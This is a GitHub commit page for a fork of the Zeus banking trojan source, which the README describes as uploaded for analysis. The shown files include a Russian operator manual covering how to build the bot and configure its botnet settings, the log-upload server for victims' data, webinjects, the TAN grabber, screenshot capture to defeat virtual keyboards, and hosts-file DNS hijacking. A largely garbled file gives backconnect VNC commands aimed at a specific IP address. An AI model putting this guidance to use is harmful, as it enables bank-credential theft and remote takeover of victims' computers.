forked from zeustrojancode/Zeus
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
441 changed files
with
217,965 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,4 @@ | ||
This is version 2.0.8.9 downloaded from | ||
http://www.mdl4.com/2011/05/download-zeus-source-code/ | ||
|
||
This repository doesn´t contain my code I have uploaded it to GitHub to simplify the process of getting/analysing the code. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,135 @@ | ||
3й пункт: | ||
|
||
Настройка бота | ||
Пошаговая установка: | ||
1)Из имеющегося у вас пакета сборки, запустите файл 'local\cp.exe', это билдер файла конифгурации и бота | ||
2)Откройте раздел 'Builder'. Нажмите кнопку 'Browse' и укажите там файл конфигурации, имя котрого 'local\config.txt'. | ||
3)Нажмите кнопку 'Edit config', в результате должен запуститься текстовый редактор. Перенастройте файл вот так: | ||
|
||
Первое: | ||
Исходный файл конфигурации представляет собой текстовый файл в кодировки Windows, и нужен только для создания конечного файла конфигурации (который представляет собой бинарный файл для загрузки ботом) и самого бота. В вашем пакете сборки пример файла конфигурации должен находится в папке 'local' и иметь имя config.txt. Откройте файл можно в любом текстовом редакторе, например 'Блокнот'(Notepad). | ||
|
||
Файл состоит из записей, по одной записи в строку. Запись же состоит из параметров, первый параметр обычно определяет имя записи (но это не всегда так, например, в случаи когда идет перечисление каких либо данных, имени нет). Параметры разделяются между собой пробелами, если же в самом параметре встречается пробел, или символ табуляции, этот параметр следует заключить в двойные кавычки ("), тоже правило применятся и к имени. Количество параметров не ограничено, также если у записи есть имя, то оно читается без учета регистра | ||
Примеры: | ||
username Kot Matroskin | ||
название записи - username, параметр 1 - Kot, параметр 2 - Matroskin. | ||
|
||
username "James" Bond" | ||
название записи - username, параметр 1 - James, параметр 2 - Bond. | ||
|
||
username "Volodia Putin" | ||
название записи - username, параметр 1 - Volodia Putin. | ||
|
||
"url" "http://sex.com/" index.php | ||
название записи - url, параметр 1 - http://sex.com/, параметр 2 - index.php | ||
|
||
Также существуют специальные имена записей, которые позволяет делить файл конфигурации насколько угодно подразделов, которые могут содержать внутри себя сколько угодно подразделов и записей. Они называются разделами и состоят из имени entry и параметра определяющего название раздела (регистр также не учитывается в данном параметре), окончание же раздела обозначается записью end. Далее в документации, вложенность записи относительно подразделов, будут обозначатся через ->. Т.е. записиь с именем username принадлежащая разделу userdata, будет обозначена как userdata->username и т.д. | ||
|
||
Примеры: | ||
entry "userdata" | ||
fname "petia" | ||
lname "lolkin" | ||
end | ||
|
||
entry compdata | ||
name "pcvasya" | ||
entry devices - содержимое раздела, пример, когда записи не имеют имени, здесь просто идет перечисление устройств. | ||
cdrom | ||
"hdd" | ||
fdd | ||
end | ||
end | ||
|
||
Также существует возможность вставки комментариев, комментарий должен находиться в отдельной строке, и начинаться с символа ';'. Если получается, что первый параметр в записи тоже начинается с ';', то этот параметр следует заключить в кавычки. | ||
|
||
Примеры: | ||
;Hello.I think that I'm hero! | ||
;How are you/ -это не запись | ||
";I love you" - а вот это уже запись. | ||
|
||
Второе: | ||
Записи файла конфигурации | ||
Файл состоит из двух разделов StaticConfig и DynamicConfig. | ||
|
||
StaticConfig, значения этого раздела прописываются непосредственно в файл бота, т.е. в exe, и определяют основное поведение бота на компьютере жертвы. | ||
В зависимости от вашей сборки, некоторые параметры могут не иметь для вас значения, все значимые параметры прописаны в примере, прилагаемом к пакету сборки. | ||
botnet [строка] - определяет название ботнета, которому принадлежит бот. | ||
строка - название ботнета, до 4-х символов, или 0 - для значения по умолчанию. | ||
|
||
Рекомендуемое значение: botnet 0 | ||
|
||
timer_config [число1] [число2] - определяет промежутки времени через которое следует получить обнавление файла конфигурации. | ||
число1 - определяет время в минутах через которое следует обновить файл конфигурации, в случаи успешной загрузки предыдущий раз. | ||
число2 - определяет время в минутах через которое следует обновить файл конфигурации, в случаи ошибки при загрузки предыдущий раз. | ||
|
||
Рекомендуемое значение: timer_config 60 5 | ||
|
||
timer_logs [число1] [число1] - определяет промежутки времени через которое следует отправлять накопленные логи на сервер. | ||
число1 - определяет время в минутах через которое следует отправить логи, в случаи успешной отправки предыдущий раз. | ||
число2 - определяет время в минутах через которое следует отправить логи, в случаи ошибки при отправки предыдущий раз. | ||
|
||
Рекомендуемое значение: timer_logs 2 2 | ||
|
||
timer_stats [число1] [число2] - определяет промежутки времени через которое следует отправлять статистику на сервер. (сюда входят инасталлы, нахождение в онлайн, открытые порты сервисов socks, скриншоты и т.д.) | ||
число1 - определяет время в минутах через которое следует отправить статистику, в случаи успешной отправки предыдущий раз. | ||
число2 - определяет время в минутах через которое следует отправить статистику, в случаи ошибки при отправки предидущий раз. | ||
|
||
Рекомендуемое значение: timer_logs 20 10 | ||
|
||
url_config [url] - URL по который расположен основной файл конфигурации, этот параметор является самым важным, если при заражении компьюетра жертвы по указаной URL не будет доступен данный конфиг, то заражение не имеет смысла. | ||
|
||
url_compip [url] [число] - определяет сайт на котором можно проверить свой IP, служит для определения NAT. | ||
url - определяет URL сайта | ||
число - определяет количетсво байт, которые достаточно с качать с сайта чтобы увидет в скаченом свой IP. | ||
|
||
blacklist_languages [число1] [число2]...[числоX] - определяет список кодов языков Windows, для которых бот будет всегда находится в спяшем режими, т.е. он не будет высылать логи и статистику, но будет обращаться к файлу конфигурации. | ||
числоX - код языка, например для RU - 1049, EN - 1033. | ||
|
||
DynamicConfig, значения этого раздела прописываются в конечный файл конфигурации. | ||
В зависимости от вашей сборки, некоторые параметры могут не иметь для вас значения, все значимые параметры прописаны в примере, прилагаемом к пакету сборки. | ||
url_loader [url] - определяет URL, по которой можно скачать обновление бота. Данный параметр актуален, только если вы запустили в ботнете новую версию бота и прописали конфигурацию от него по той же URL, что и старая конфигурация, в таком случаи старые версии бота начнут обновиться, скачивая файл, указанный в этой записи. | ||
|
||
url_server [url] - определяет URL, по которой будут отправляться статистика, файлы, логи и т.д. с компьютеров жертв. | ||
|
||
file_webinjects - определяет локальный файл, в котором располагается список веб-ижектов. Описание формата данного файла вы найдете здесь | ||
|
||
Подраздел AdvancedConfigs - перечисляет список URL, по которым можно скачать резервный файл конфигурации, в случаи не доступности основного файла. Рекомендуется заполнить этот подраздел 1-3 URL, что позволит спасти ботнет от гибели в случаи недоступности основного файла конфигурации, и в результате спокойно перевести его на другой сервер. Обязательное наличие файлов по этим URL не требуется, главное потом иметь возможность разместить файлы по этим URL. Файлы следует размешать там только после обнаружения недоступности основного файла конфигурации, если же вы всегда хотите располагать файлы по этим URL, то следует обновлять их все синхронно вместе с основным файлом конфигурации. Резервные файлы не чем не отличаются от основного, и создаются таким же образом. | ||
|
||
Пример: | ||
entry "AdvancedConfigs" | ||
"http://url1/cdffd.ccc" | ||
"http://url2/cdf34.dc" | ||
end | ||
|
||
Подраздел WebFilters - Имеет два назначения: | ||
перечисляет список масок URL, которые должны обязательно записаны или исключены из лога, в независимости от типа запроса (GET, POST). Если первым символом маски является '!', то при совпадении URL с этой маской, запись в лог не будет производится (например маска "!*" запретит запись всех URL, кроме тех которые перечислены перед ней). | ||
Задает маску URL, при начале обращения к которой будут создаватся скриншоты экрана в области нажатия левой кнопки мыши (полезен для обхода виртуальных клавиатур). Такая маска URL должна начинаться с символа '@'. | ||
Примечание: для URL перечисленных в этом подразделе игнорируется значение параметра StaticConfig.ignore_http | ||
|
||
Пример: | ||
entry "WebFilters" | ||
;в лог будут писаться все URL совпадающие с этой маской. | ||
"http://www.google.com/*" | ||
;в лог не будут писаться все URL совпадающие с этой маской. | ||
"!http://*yahoo.com/*" | ||
;после открытия этой страницы, будут создаваться скриншоты в области клика левой кнопки мыши. | ||
"@http://www.rambler.ru/" | ||
end | ||
|
||
Подраздел WebFakes - перечисляет список прозрачных URL-редиректов (фейк-сайты), подробное описание этого раздела находится здесь | ||
|
||
Подраздел TanGrabber - определят правила для TAN-граббера, подробное описание этого раздела находится здесь | ||
|
||
Подраздел DnsMap - список DNS изменений, которые необходимо произвести в файле %system32%\drivers\etc\hosts. | ||
Формат записи: [IP] [домен]. | ||
IP - новый IP домена. | ||
домен - имя домена для которого изменяется IP. Если домен начинается с символа '!', то этот домен будет у дален из файла, естественно если он будет там найден. Значение параметра IP игнорируется и может быть любым. | ||
|
||
Пример: | ||
entry "dnsmap" | ||
127.0.0.1 microsoft.com | ||
192.168.0.1 google.com | ||
0.0.0.0 !yahoo.com | ||
end | ||
Третье: ) | ||
Затем сохраните файл. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,11 @@ | ||
��� �� ���������� ������: | ||
1. �������� ����� � ���������� IP | ||
2. �������������� �� ���� ���� zsbcs.exe | ||
3. ���������� ��������� ������ � ���������� ���� ���� �� ���������� �����������: zsbcs.exe listen -ipv4 -cp:1080 -bp:4500 | ||
-cp:1080 ��� ���� ������� ����������� �� ������ ��� ������ vnc viewer'� | ||
-bp:4500 ���� ����, ����� ������� ��� ����������� � ������. | ||
4. � ������� ������� ��� ������� ���� ��������� ������: bot_bc_add vnc 24.255.207.83 4500 | ||
(��� 24.255.207.83 IP ������) | ||
5. ����� ����� vnc viewer � ������ ��� IP ������ � ���� ��� ��������: 24.255.207.83:1080 | ||
���� ������� ����������� ���� � vnc viewer'� � ������ ������������ � ���� ��������� ������. ����� ���������� ������ �� �������� ��������� ���������� �������� Ctrl+C. | ||
6. ����������� ������� ��� bot_bc_remove vnc 24.255.207.83 4500 ����� �������� |
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Oops, something went wrong.